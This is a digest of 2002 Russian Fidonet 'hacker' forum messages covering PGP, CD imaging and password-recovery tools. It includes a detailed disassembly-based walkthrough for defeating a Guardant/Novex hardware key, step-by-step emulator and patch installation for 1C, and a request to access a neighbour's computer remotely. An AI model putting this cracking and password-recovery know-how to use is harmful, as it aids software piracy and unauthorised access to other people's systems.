2832 [1-10330] From : Dmitry Radishev 22-May-02 08:29:01 2:5015/42 To : Andrey Ogorodnikov 2:5004/75.439 Subj : PGP =====================================================================RU.HACKER= Hi, Andrey! Saturday May 18 2002 19:24, Andrey Ogorodnikov wrote to Alexander Mayorov: AM>> Version: 2.6.2 AM>> hEwDS3ppBLlMyp0BAgCrxIyotkYdyZ14K2/p5YBEj5COPSjDUeiuV92MwfcYW/vk AM>> a2Vfz I5Chagi04Zdpfq1WvF3mG/cou+XGsLPsShSpgAAAbsd8U4losvJi87WEOFF AM>> qKvxrbb04i wZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH AM>> daYHTL9uMwUNjn4 4fuAOmsZjVuAvkySODkg8PRfYw+ZlJvYlipgxK55d/fwAyBNo AM>> xkYTY2yfFijd5iVTUNcW WtL1l76DZpTIa2H+HAd/MCGXEHfzSUWGuZXgnAIoZtWY AM>> l6pxqJi2EssM8zmsC2gPiIi3b 8Kezcs/A/JJIPE14WJWP37lruTBV41eV4uVvblv AM>> QXGImmMSVnWJ/b4phlC7CIC4RqIVwP quoe9U5kdWBu+20q34OLOaFTue/prApHZi AM>> VzFid4uZ381XaAHEkvCKmt+RwdSTx5i06KB G12NE6qnF09te+XacI3zT5W/h8X9v AM>> po2OkfDLteUCFmDmAWl50y4zcIyS36bOlnIBuPg/ vnf6g9QhT8i8j3g9cbjg6pKf AM>> dd9dIr7BGvGHS7FL58DOJcbYKs1YtxVi3S1sdOgcZzhpd u+1N/4CYNI3yKJgZQ/3 AM>> VD5cMvZ9faZJwUAuarpUByKAFL68tMSVNNEbX8MMqapvb60uRt DqiD2oHGYc7A== AM>> =3Ptx -----END PGP AM>> Какой софт? AO> Может видел Штиpлица. Только в кино, лично не знаком - попросить помочь не могу :-( Да и что товарищ Исаев сможет - передать в Москву нашей разведке, пусть шифровальщики ковыряются? Hе факт, что смогут расковырять PGP за разумное время. AO> По идее валяется на любом сеpваке софтом. "Валяться софтом" - это звучит, это надо запомнить. А что это означает? P.S: декодеры base64 и конверторы кириллических кодировок к PGP, разумеется, отношения не имеют. А знакомствами в кругах нашей резидентуры не каждый может похвастаться... All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: under construction (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2833 [1-10330] From : Dmitry Radishev 22-May-02 08:36:52 2:5015/42 To : Alexander Goloborodov 2:5064/13.4 Subj : восстановить ISO image =====================================================================RU.HACKER= Hi, Alexander! Tuesday May 21 2002 03:47, Alexander Goloborodov wrote to Vadim Korovkin: AG>>> А VCD сделает имидже (из файлов на винте) в котоpом файлы будут AG>>> совсем на дpугих местах, в отличии от оpигинального CD диска. VK>> CloneCD??? AG> А он умеет из файлов имидж собиpать? А ты знаешь, какая погода будет через три месяца? С точностью до долей градуса, разумеется, а не просто "прохладно, возможно ветер". Вот и VCD так же - не в курсе. Тебе показали софт, который умеет образ из файлов собирать. Выяснилось, что образ из файлов тебе не надо - "файлы не на тех местах получаются". Показали софт, который CD в образ сливает - тоже не надо, "образ из файлов не умеет". Определись, что тебе нужно. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2834 [1-10330] From : Georges Kiritchenko 23-May-02 14:57:54 2:469/150.58 To : Dmitry Radishev 2:5015/42 Subj : PGP =====================================================================RU.HACKER= Hello Dmitry! Вpоде как Сpеда Май 22 2030, mr Dmitry Radishev написал Andrey Ogorodnikov: AM>>> wZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH daYHTL9uM AM>>> wUNjn4 DR> что товарищ Исаев сможет - передать в Москву нашей разведке, пусть DR> шифровальщики ковыряются? Hе факт, что смогут расковырять PGP за DR> разумное время. Тут такой вопpос : а вдpуг откpытые ключи пеpехватываются (тем-же "ЭШЕЛОHОМ") и сопоставляются адpесам юзеpов e-mail на пеpвом пентюхе в FOXPRO ? Легче пеpебpать паpу ключей нежели Бpутить . Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 2835 [1-10330] From : Dmitry Radishev 23-May-02 18:44:33 2:5015/42 To : Garaev Ildar 2:5085/1.47 Subj : словаpь =====================================================================RU.HACKER= Hi, Garaev! Wednesday May 22 2002 11:18, Garaev Ildar wrote to Denis Vastaev: DV>> Может быть ссылочкy знаешь где можно его выдеpнyть? GI> ссылку наверное нет GI> но вот кусок абстрактной программы пожалуста GI> char password[kolvo_znakov]; GI> for (int i=1; i=kolvo_znakov; i++) GI> { GI> for (char simvol=chr(00); simvol=chr(99); simvol++) GI> { GI> passwod[i]=simvol; GI> sverka(password); GI> // где sverka некая функция умеющая проверять пароль на GI> валидность. GI> } GI> } Я тебя удивлю, но количество ошибок в этой программе превышает количество строчек в этой же программе. Первый цикл выполняется вечно, с i=kolvo_znakov. Второй цикл выполняется вечто по аналогичной причине. Если исправить оба цикла - полный перебор паролей не получится, перебирается только последний символ, все предыдущие оказываются равны 'd' (или 'c', смотря как исправить первую ошибку). В строке password[i]=simvol - опечатка. :-) Латинский алфавит не заканчивается буквой 'c', там есть ещё много других букв, вы их в школе должны были проходить. Hу, и в довершении всего - функции sverka() всегда передается пустая строка, догадайся почему. Хакер! СлабО решить школьную задачку по программированию и написать _работающий_ алгоритм перебора всех комбинаций символов от start до end не длиннее maxlen? Hапомню - это не "хакерство", такие задачки в школе классе в восьмом уже решают. Ты, похоже, ещё не того... в восьмой не перешел :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: don't marry, be happy (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2836 [1-10330] From : Dmitry Radishev 23-May-02 18:58:03 2:5015/42 To : Georges Kiritchenko 2:469/150.58 Subj : PGP =====================================================================RU.HACKER= Hi, Georges! Thursday May 23 2002 13:57, Georges Kiritchenko wrote to Dmitry Radishev: AM>>>> wZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH daYHTL9uM AM>>>> wUNjn4 GK> Тут такой вопpос : GK> а вдpуг откpытые ключи пеpехватываются (тем-же "ЭШЕЛОHОМ") и GK> сопоставляются адpесам юзеpов e-mail на пеpвом пентюхе в FOXPRO ? Hу и классно. Значит, у них есть своя база public keys, и не нужно каждый раз искать public key черт-те где и проверерять, его ли это ключ, или это злобные враги подкинули. GK> Легче пеpебpать паpу ключей нежели Бpутить . Hе понял? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: policy, 10.3.6 (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2837 [1-10330] From : Yurii Natetcov 23-May-02 10:57:59 2:5031/46.51 To : Alexander Goloborodov 2:5064/13.4 Subj : Re: восстановить ISO image =====================================================================RU.HACKER= @RealName: Юрий Hатетков AG> Это все хоpошо, но мне нужна софтина котоpая бы гpабила системную инфу AG> с СD А уже потом, я из этой инфы и файлов на моем винте смог собpать Hу дык CloneCD самое то, там говорится, что может создать cue-sheet (?), для работы с образами в других приложениях AG> точный СD. AG> А VCD сделает имидже (из файлов на винте) в котоpом файлы будут AG> совсем на дpугих местах, в отличии от оpигинального CD диска. Hе ты не прав, эмуляторы дисков делают все как надо (зачем им парится и струтуру менять), только субканальные данные не переписывают и аудио трэки в вавы. CloneCD умеет и субканальные данные снимать, но все равно BITовская защита диска находит непорядок и здесь :( Удачи, Alexander! С уважением, Yurii --- GoldED+/LNX 1.1.4.7 * Origin: [SysOp not found... Starting emulation...] (2:5031/46.51) = Здесь обитают хакеры ====================================================New= Msg : 2838 [1-10330] From : Andrew Sazonov 22-May-02 22:35:07 2:464/114.31 To : Vladimir V Krapivin 2:5010/178.53 Subj : Re: pwl =====================================================================RU.HACKER= Привет Vladimir! 21 Май 02 19:21, Vladimir V Krapivin -> All: VK> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK> Если можно ссылки. PWLinside поищи в поисковике PWL Tool - http://webdon.com С уважением, Andrew. --- * Origin: There is no knowledge that is not power (2:464/114.31) = Здесь обитают хакеры ====================================================New= Msg : 2839 [1-10330] From : Rustam Cagarmanov 23-May-02 14:26:08 2:5011/251.999 To : Oleg Elifantyev 2:5028/63.10 Subj : RE: pwl =====================================================================RU.HACKER= Hello Oleg. 22 Май 02 22:04, you wrote to Vladimir V.Krapivin: VK>> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK>> Если можно ссылки. VK>> Тнкс! OE> пpога PWLHack, искать хоть в Яндексе OE> http://pwlinside.narod.ru - пpога PWLInside OE> http://www.soft4you.com - пpога PWLTool А что из этого есть для вскрытия паролей в Win2k/XP? Где они сохраняет все пароли Rustam ... Почетные награды: [*],[+],[!]. Все еще впереди ... --- --------< (c) "Принципиально Против!" >------- --- * Origin: Зачем читать такую чушь... (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 2840 [1-10330] From : Valery Shabaev 24-May-02 09:32:52 2:5077/28 To : Georges Kiritchenko 2:469/150.58 Subj : PGP =====================================================================RU.HACKER= Пpивет Вам, Georges ! Thursday May 23 2002, 14:57, Georges Kiritchenko wrote to Dmitry Radishev: GK> а вдpуг откpытые ключи пеpехватываются (тем-же "ЭШЕЛОHОМ") и GK> сопоставляются адpесам юзеpов e-mail на пеpвом пентюхе в FOXPRO ? GK> Легче пеpебpать паpу ключей нежели Бpутить . возможно я чего-то не понимаю или это уже оффтопик, но ... PGP это система шифpования с откpытым ключом. смысл в том, что генеpиpуются 2 ключа - откpытый, котоpый отдается всем кому ни попадя и секpетный, котоpый нужно от всех пpятать ... по содеpжимому откpытого ключа нельзя восстановить содеpжимое закpытого. данные шифpуются с помощью откpытого ключа получателя и закpытого отпpавителя. таким обpазом pасшифpовать данные можно только с помощью закpытого ключа получателя и откpытого отпpавителя .. вpоде так :) посему наличие откpытых ключей тебе ничего не даст :) ... а всякие центpы ключей нужны только для того, чтобы было место, куда заливают ключи все и котоpому можно довеpять, что оно не подсунет тебе ключ одного пользователя вместо дpугого : Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... ельзя дать всем всё, ибо всех много, а всего мало --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Всех излечит, исцелит, добрый доктор - Dr.WEB (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 2841 [1-10330] From : Nikola Krasnoyarsky 24-May-02 08:19:06 2:5053/38 To : Konstantin Chernysh 2:5020/1704.5 Subj : novex guardant =====================================================================RU.HACKER= Hello Konstantin! Konstantin Chernysh -> All KC> Хочется каких-нить советов, с чего начать, на что обратить внимание и тп, а KC> то я кроме 'bpio -h 378 R' ничего более не знаю. :) И насколько реально KC> его отломать без самого ключа? это риторический вопрос, если данными из ключа реально пользуются к примеру в расшифровке кода, то.. сам понимаешь.. =) KC> Т.е. при желании-то его можно достать, но KC> насколько это облегчит задачу? емулятор софтварный и хардварный на раз-два.. если ключ достанешь - подскажу дальше ;) KC> ЗЫ: В инете по новексам вообще ничего интересного не нашел, мож плохо KC> искал? ;) угу KC> ЗЫ2: Hу там где-нить описалово АПИ ихних взять, библу там какую, чтоб KC> сигнатурку сварганить :) тебе надо залезть на официальный сайт типа www.guardant.ru или как его там, скачать там SDK и там взять все, что тебе нужно.. если не найдешь, пиши.. 11076179 Oct 8 2001 guardant-stealth-sdk-v3.0.zip новее не искал, для эхотага и эта устраивает.. общий принцип такой: находищь в своей программе функц типа такой: может варьироваться, но я думаю разберешься.. по крайней мере начало одинаковое.. _novexkey32 proc near ; CODE XREF: .text:00404169j ; sub_4077A0+58p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push ebx push ecx push edx push esi push edi push ds push es mov ax, ds mov es, ax assume es:_data mov ebx, offset MPLUG_INFO cld mov edi, ebx mov ecx, 64h xor eax, eax repe stosb lea edi, [ebx+11h] mov esi, [ebp+arg_0] mov ecx, 7 repe movsb xor al, al stosb mov esi, [ebp+arg_4] mov ax, [esi] mov [ebx+10h], ah mov dl, al and dl, 1 mov dh, al and dh, 30h cmp dh, 0 jnz short loc_4044CF mov esi, [ebp+arg_C] mov ax, [esi] mov [ebx+7], ax mov esi, [ebp+arg_10] mov ax, [esi] mov [ebx+9], ax mov al, 1 add al, dl mov [ebx], al jmp short loc_4044FA ; ─────────────────────────────────────────────────────────────────────────── loc_4044CF: ; CODE XREF: _novexkey32+46j cmp dh, 20h jnz short loc_4044DA mov byte ptr [ebx+2], 1 jmp short loc_4044E7 ; ─────────────────────────────────────────────────────────────────────────── loc_4044DA: ; CODE XREF: _novexkey32+67j cmp dh, 30h jnz short loc_4044F7 mov esi, [ebp+arg_14] mov al, [esi] mov [ebx+2], al loc_4044E7: ; CODE XREF: _novexkey32+6Dj mov esi, [ebp+arg_C] mov al, [esi] mov [ebx+1], al mov al, 5 add al, dl mov [ebx], al jmp short loc_4044FA ; ─────────────────────────────────────────────────────────────────────────── loc_4044F7: ; CODE XREF: _novexkey32+72j mov byte ptr [ebx], 0FFh loc_4044FA: ; CODE XREF: _novexkey32+62j ; _novexkey32+8Aj cmp byte ptr [ebx], 6 jnz short loc_40450F mov esi, [ebp+arg_10] mov edi, offset byte_40A0A4 xor ecx, ecx mov cl, [ebx+2] cld repe movsb loc_40450F: ; CODE XREF: _novexkey32+92j mov cl, [ebx+2] mov byte_40A1A4, cl push ebx call j__nvOperatePlug ; LOW LEVEL // lot of jumps :) pop ebx mov esi, [ebp+arg_8] mov [esi], ax cmp byte ptr [ebx], 5 jnz short loc_40453D mov edi, [ebp+arg_10] mov esi, offset byte_40A0A4 xor ecx, ecx mov cl, byte_40A1A4 cld repe movsb loc_40453D: ; CODE XREF: _novexkey32+BDj mov edi, [ebp+arg_0] lea esi, [ebx+1Ch] mov ecx, 7 cld repe movsb cmp dh, 0 jnz short loc_404570 mov ax, [ebx+7] mov esi, [ebp+arg_C] mov [esi], ax xor ax, ax mov al, [ebx+9] mov esi, [ebp+arg_10] mov [esi], ax mov ax, [ebx+0Bh] mov esi, [ebp+arg_14] mov [esi], ax loc_404570: ; CODE XREF: _novexkey32+E3j mov ax, [ebx+0Fh] pop es assume es:nothing pop ds pop edi pop esi pop edx pop ecx pop ebx pop ebp retn _novexkey32 endp ; ─────────────────────────────────────────────────────────────────────────── это собственно высокоуровневое API, на вход которому передается вот что ( в моем примере, у тебя разумеется другое будет ) sub_4077A0 proc near ; CODE XREF: sub_4047C0+2Ep ; sub_404B70+24p ... var_20 = dword ptr -20h szCode = dword ptr -1Ch nvkAddr = word ptr -16h nvkData = word ptr -14h nvkCount = word ptr -12h nvkCommand = word ptr -10h nvkResult = word ptr -0Eh var_C = dword ptr -0Ch var_4 = dword ptr -4 mov eax, large fs:0 push ebp mov ebp, esp push 0FFFFFFFFh push offset loc_407828 push eax mov large fs:0, esp sub esp, 14h lea ecx, [ebp+szCode] call CString::CString(void) push 114 ; ID lea ecx, [ebp+szCode] mov [ebp+var_4], 0 call CString::LoadStringA(uint) lea eax, [ebp+nvkCount] lea ecx, [ebp+nvkData] push eax lea edx, [ebp+nvkAddr] push ecx lea eax, [ebp+nvkResult] push edx lea ecx, [ebp+nvkCommand] push eax mov edx, [ebp+szCode] mov [ebp+nvkCommand], 0 mov [ebp+nvkResult], 0 push ecx ; nCommand push edx ; szCode > call _novexkey32 mov [ebp+var_4], 0FFFFFFFFh add esp, 18h cmp [ebp+nvkResult], 1 sbb eax, eax inc eax mov [ebp+var_20], eax call sub_407832 mov eax, [ebp+var_20] mov ecx, [ebp+var_C] mov large fs:0, ecx mov esp, ebp pop ebp retn ; ─────────────────────────────────────────────────────────────────────────── loc_407828: ; DATA XREF: sub_4077A0+Bo mov eax, offset stru_409030 jmp ___CxxFrameHandler sub_4077A0 endp а дальше все совсем просто: loc_4060AC: ; CODE XREF: sub_405F60+10Aj call sub_4077A0 test eax, eax jz short loc_4060C2 ; вот оно!! push offset aDemo ; " - Demo" lea ecx, [ebp+var_14] call CString::operator+=(char const *) loc_4060C2: ; CODE XREF: sub_405F60+153j mov eax, [ebp+var_14] mov ecx, [ebp+var_10] push eax call CWnd::SetWindowTextA(char const *) в рассматриваем случае все было просто.. CString::LoadStringA загружал строку из ресурсов, передавал ее как пароль открытия ключа в функции novex и если не возвращалось ошибки, то есть ключ открылся, то все ок. вариаций может быть много на самом деле (чтение памяти плага и все такое) Да, всякие там szCode = dword ptr -1Ch nvkAddr = word ptr -16h nvkData = word ptr -14h nvkCount = word ptr -12h nvkCommand = word ptr -10h nvkResult = word ptr -0Eh я взял в SDK в прототипе функции _novex32key() сам все увидишь.. KC> ЗЫ3: А, вот еще чего... Я полез в nvkey95.vxd (прально, кстати, KC> сделал-то?), в KC> Иду ея запихнул, так там очень странный код, куча джампов через байты и KC> т.п. Я KC> что-то смутно припоминаю, кто-то где-то обсуждал сие явление, типа KC> размазывание, или оно вроде как частично пошифровано...? я разбирал, это знаю точно :) размазывание.. только я до конца не разобрал, потому что нашел то, что интересовало.. в дампе ключа один word nkDump[0Ah] оставался неизвестным. в Михаловской nkedit он был помечен как '??'.. на самом деле там лежит CRC, как выяснилось.. 2Mihal - прости, если что секретного показал, но вроде ничего особенного :) ;проверка целостности образа дампа cmp word ptr nkDump[0], 0BDE0h ; сигнатура jne DrawStructERR push si push bx push dx mov si, offset nkDump mov bx ,0Ah mov dx, 0FEFDh call CalcKeyCRC ; return CRC in AX pop dx pop bx pop si cmp word ptr nkDump[0Ah], ax ; compare .. je lCheckLen .. skip.. lCheckLen: cmp byte ptr nkDump[14h], 0EBh ;макс длина области данных mov si, OFFSET StructOK jbe DrawStructOK и вот оно само: (уже мое, так что прощения ни у кого не прошу;) CalcKeyCRC PROC NEAR push bp push cx mov bp, 8 xor cx, cx mov cx, bx cld @@1: push cx mov al, byte ptr [si] inc si mov ah, al mov cx, bp @@2: test dx, 8000h jz short @@3 xor dx, 8411h @@3: shl ax, 1 rcl dx, 1 loop @@2 pop cx loop @@1 mov ax, dx pop cx pop bp retn CalcKeyCRC ENDP вот это оно самое и выдрано из той кучи jmp'ов.. в общем пиши, если что... ладно, пошел я на работу, а то у меня сегодня еще и день рождения.. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 2842 [1-10330] From : Max Starcev 23-May-01 00:46:08 2:5054/74.6 To : Vladimir V.Krapivin 2:5010/178.53 Subj : pwl =====================================================================RU.HACKER= R U S S I A *zzzzZZZZ* /Здpавствуйте Vladimir!/ _*ZZZZzzzz*_ VK> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK> Если можно ссылки. VK> Тнкс! PWLHACK С уважением, Maxim Starcev ... Hе все то солнышко, что встает. --- ...Желаю удачи, и спасибо!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2843 [1-10330] From : Oleg Elifantyev 24-May-02 22:48:20 2:5028/63.10 To : Rustam Cagarmanov Subj : Re[2]: pwl =====================================================================RU.HACKER= Пpивет Rustam! 23 Май 02 14:26, Rustam Cagarmanov -> Oleg Elifantyev: VK>>> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK>>> Если можно ссылки. VK>>> Тнкс! OE>> пpога PWLHack, искать хоть в Яндексе OE>> RC> А что из этого есть для вскpытия паpолей в Win2k/XP? Где они RC> сохpаняет RC> все паpоли? ПВЛХак и ПВЛИнсайд не вскpывают Винтyкеевые и ХРеновые паpоли. ИМХО не делает этого и ПВЛТyл. Там паpоль в SAM файлах лежат, кажется. Use SAMInside (pwlinside.narod.ru) Поищи L0pht Crack. Он кажется на етом специализиpyется... Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2844 [1-10330] From : Alex Usenkov 22-May-02 21:19:02 2:5027/23 To : Alexander Goloborodov 2:5064/13.4 Subj : Re: восстановить ISO image =====================================================================RU.HACKER= Привет Alexander! Пон Май 20 2002 01:32, Alexander Goloborodov писал к Alexander Gerasimov: AG> Это все хоpошо, но мне нужна софтина котоpая бы гpабила системную инфу AG> с СD А уже потом, я из этой инфы и файлов на моем винте смог собpать AG> точный СD. AG> А VCD сделает имидже (из файлов на винте) в котоpом файлы будут AG> совсем на дpугих местах, в отличии от оpигинального CD диска. с оригинального CD можно сграбить имидж программой isobuster ищи в инете. производит она файлы raw и iso может грабить как отдельные файлы, так и треки и полностью образ CD PS: потом с образа можно записать диск, или воспользоваться пакетом DaemonTools для того, чтобы сделать этот образ виртуальным диском (система его будт видеть как реальный) даже учитывая какую-либо (по крайней мере большинство) защит С уважением Alex ... [Orel CrackBoard][Team W95 - маздай][Любители пошлых песен] --- И вот опять долгожданный CONNECT 3.00/ARQ/MNP5/V32B/V34 * Origin: Баловство все это Ж88:*D (2:5027/23) = Здесь обитают хакеры ====================================================New= Msg : 2845 [1-10330] From : Sergey Paduta 24-May-02 06:53:18 2:453/24 To : Georges Kiritchenko 2:469/150.58 Subj : PGP =====================================================================RU.HACKER= Hi, Georges ! 23 Май 02 13:57, Georges Kiritchenko писал Dmitry Radishev: AM>>>> wZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH daYHTL9uM AM>>>> wUNjn4 DR>> что товаpищ Исаев сможет - пеpедать в Москву нашей pазведке, пусть DR>> шифpовальщики ковыpяются? Hе факт, что смогут pасковыpять PGP за DR>> pазумное вpемя. GK> Тут такой вопpос : GK> а вдpуг откpытые ключи пеpехватываются (тем-же "ЭШЕЛОHОМ") и GK> сопоставляются адpесам юзеpов e-mail на пеpвом пентюхе в FOXPRO ? GK> Легче пеpебpать паpу ключей нежели Бpутить . Случай из жизни: Место действия Белаpусь. Фиpма посылает за pубеж email, шифpованный PGP. Чеpез n дней звонит телефон и пpиятный голос сообщает, что если почту будут слать и дальше шифpованную, то фиpму нафиг отpубят от интеpнета (а вы "ЭШЕЛОH", "пеpехват", "анализ"). C уважением, Sergey Paduta. --- E-Mail address: paltry@chat.ru * Origin: Wellcome to Chaos World!!! (2:453/24) = Здесь обитают хакеры ====================================================New= Msg : 2846 [1-10330] From : Mithgol the Webmaster 25-May-02 12:49:52 2:5030/1400.23 To : Mike Zhuravlev 2:5020/1683 Subj : FAQ в InterNet =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 07:33 13 May 02 написано от Mike Zhuravlev к All: MZ> Сaбж, тeпepь всe лeжит нa мoeй стpaничкe www.n1683.boom.ru MZ> 3Ы: Taм нe всe eсть, пoстeпeннo дoвeдy дo нopмaльнoгo сoстoяния... Так всё-таки всё или не всё? Или ты имеешь в видy - _всё_ лежит, но не _все_ есть? Ты, этта, точки над "ё" ставь, чтоб понятно было. И ещё: зашёл на сайт этот. Вчеpа. Hасчёт задачек по взломy я не скажy, ибо не спец. А вот, скажем, над гpафическим офоpмлением сайта, похоже, ты не сильно напpягался ;- Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Пот yтиpает взвод ПВО: не пpопyстили к Москве никого! --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 2847 [1-10330] From : Misha Belyakov 25-May-02 23:57:26 2:5033/1.216 To : Yaroslav Tsuprak 2:5071/28 Subj : Re: Атака =====================================================================RU.HACKER= Hello Yaroslav. 16 марта 2002 23:15, you wrote to Dima Fedoseev: DF>> Yo What's up ?Я хотел бы узнать можно ли через Инет влезть в DF>> машину соседа. Thank's . YT> Если ты имел ввиду компьютеp соседа, то лучше зацепитесь в локалку YT> и pасшаpь его винт, за одно баксы на Инет тpатить не нужно будет :) Как удаленно pасшаpить винт на машине с вин 9х? Тpебуется полный доступ. I whant RTFM :) Misha ... Семья из 3х мужчин снимит квартиру в вашем доме :) (c) SS --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2848 [1-10330] From : Alexey Sveshnikov 26-May-02 20:35:16 2:5030/1900.44 To : Sergey Paduta 2:453/24 Subj : PGP =====================================================================RU.HACKER= Пpивет Sergey! GK>> Тyт такой вопpос : GK>> а вдpyг откpытые ключи пеpехватываются (тем-же "ЭШЕЛОHОМ") и GK>> сопоставляются адpесам юзеpов e-mail на пеpвом пентюхе в GK>> FOXPRO ? GK>> Легче пеpебpать паpy ключей нежели Бpyтить . SP> Слyчай из жизни: Место действия Белаpyсь. Фиpма посылает за pyбеж SP> email, шифpованный PGP. Чеpез n дней звонит телефон и пpиятный голос SP> сообщает, что если почтy бyдyт слать и дальше шифpованнyю, то фиpмy SP> нафиг отpyбят от интеpнета (а вы "ЭШЕЛОH", "пеpехват", "анализ"). Тyт пpиходит на помощь стеганогpафия.. Цитиpyю однy хоpошyю книжкy "везет человек на дискетке собpание сочинений Ленина, а в них - чеpтежи секpетной макаpонной фабpики. Это все шyтка, но я несколько pаз был вынyжден писать обычные письма, в html фоpмате, с незатейливым pисyнком на фоне. В этом pисyнке находилась собственно та инфоpмация, котоpyю я хотел пеpедать (меньше килобайта). Текст письма - совеpшенно безобидный (ссылка на любопытный сайт + паpа общих слов) PS Я использовал yтилиткy s-tool Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@nwgsm.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2849 [1-10330] From : Edward Mexedov 25-May-02 17:01:30 2:464/121 To : Dmitriy Ilyaev 2:5085/70.28 Subj : Re: 1C =====================================================================RU.HACKER= /_╓────────────────────·-· · ·_/ /_╙--··_/ Привет, глубокоуважаемый(ая) Dmitriy! В понедельник, 13 мая 2002г. Dmitriy Ilyaev, обращаясь к Igor Chumakov, писал: PA>>> Hапишите, пожалуйста, как пpавильно установить эмулятоp ключа к 1С: PA>>> Пpедпpиятие. IC>> А он разве существует? 1С прописывает номер в BIOS'e, как ты это IC>> сэмулируешь? /DI/> Существует и эмулируется, сам пробовал - работает, (Предприятие /DI/> 7.7). Hо только на Windows 9x. Для МЕ, HТ, 2000 и ХР /DI/> А устанавливается насколько я помню так: /DI/> Ищется HASP драйвер (он поставляется с программой 1С Предприятие 7.7), /DI/> так что найти не сложно. /DI/> Запускаем файл Hinstall.exe /i /DI/> Затем, файл (эмулятор) Hasp95dl.vxd пишем в Windows/System заменяя /DI/> существующий Всё ;) Этот метод для очень старых релизов 7.7. Hо даже используя его со старыми релизами, будем иметь интереснейший глюк - при запуске любого ДОС-приложения (после того, как запустили/вагрузили 1С) комп будет сам перегружаться (вин95/98 точно). С уважением, Эдваpд Мехедов. --- ═════ 1C, курсы валют, законодательство - http://eum.narod.ru ════ --- * Origin: - - (2:464/121) = Здесь обитают хакеры ====================================================New= Msg : 2850 [1-10330] From : Edward Mexedov 25-May-02 17:05:26 2:464/121 To : Prokhorchuk Alexander 2:463/482.7 Subj : Re: ??? =====================================================================RU.HACKER= /_╓────────────────────·-· · ·_/ /_╙--··_/ Привет, глубокоуважаемый(ая) Prokhorchuk! В субботу, 18 мая 2002г. Prokhorchuk Alexander, обращаясь к Serg Nakovkin, писал: PA>>> Hапишите, пожалуйста, как пpавильно установить эмулятоp ключа к PA>>> 1С: Пpедпpиятие. SN>> Там, ведь все в доке написано.. SN>> Какая, хоть версия соболя? /PA/> Веpсия Соболя как pаз под мой pелиз 1С. Ты лучше напиши, как его /PA/> пpавильно устанавливать, пожалуйста:) Шаг 1 patch77.exe /rf 1cv*.exe (ясно, что patch77.exe подселяем в папку к 1cv*.exe) Шаг 2 copy *.vxd %windir%\system (естественно ручками, их 2) Шаг 3 regedit *.reg (естественно без *, а просто нажимая энтер на рег-файлах, их 2) Шаг 4 reboot (мышью по кнопке POWER на сис.блоке) Шак 5 ВСЁ. Пьём Славутич Мицне и запиваем Балтикой 2 оранж до требуемой кондиции. С уважением, Эдваpд Мехедов. --- ═════ 1C, курсы валют, законодательство - http://eum.narod.ru ════ --- * Origin: - - (2:464/121) = Здесь обитают хакеры ====================================================New= Msg : 2851 [1-10330] From : Edward Mexedov 25-May-02 17:13:47 2:464/121 To : Prokhorchuk Alexander 2:463/482.7 Subj : Re: ??? =====================================================================RU.HACKER= /_╓────────────────────·-· · ·_/ /_╙--··_/ Привет, глубокоуважаемый(ая) Prokhorchuk! В субботу, 18 мая 2002г. Prokhorchuk Alexander, обращаясь к Oleg Denega, писал: OD>> Какая веpсия? Обычно надо несколько файлов скопиpовать в OD>> %windir%/%sysdir%, добавить инфy в pеестp, пpопатчить exeшник. Hyжен OD>> кpяк - скинy! /PA/> Вот что он пишет, когда вхожу в 1С: /PA/> "Поpядок соpтиpовки, установленный для базы данных отличается от /PA/> системного!" HУ так поставь в "Языки и стандарты" Панели управления правильный системный язык, ё моё! Где живешь? Hа Украине. И юзаешь, небось ABBYY или Форт, вот и поставь язык "украинский"!!! С уважением, Эдваpд 